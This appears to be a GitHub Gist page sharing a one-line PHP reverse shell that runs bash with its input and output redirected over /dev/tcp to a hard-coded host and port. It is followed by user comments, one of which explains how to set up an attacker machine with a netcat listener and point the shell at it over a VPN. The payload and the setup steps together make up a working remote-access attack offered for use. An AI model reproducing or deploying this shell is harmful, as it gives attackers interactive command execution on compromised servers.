Created
July 17, 2014 15:06
-
-
Save rshipp/eee36684db07d234c1cc to your computer and use it in GitHub Desktop.
A tiny PHP/bash reverse shell.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'"); |
eu não sei qual ip usar, alguém me ajuda por gentileza !
estou em vpn ! em uma maquina virtual ! eu não sei se uso o da conexão vpn, da maquina virtualizada ou da minha propria maquina !
estou em vpn ! em uma maquina virtual ! eu não sei se uso o da conexão vpn, da maquina virtualizada ou da minha propria maquina !
- You have two machines, the attacker and the victim. The victim must have network access to the attacker. (Same network, if you are in a VPN , both machines must be in that network, and those are the important IPs )
- You have to open a listening port in your attacking machine, (nc -nvlp 1234)
- You have to open a reverse shell, and point it to your attacking machine (VPN IP and open listening port)
And thats all.
@SergioChicoITCL muito obrigado campeão ! você é demais !
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Yes but the solution from rapid7 works on any operating system because it does not utilize any system calls.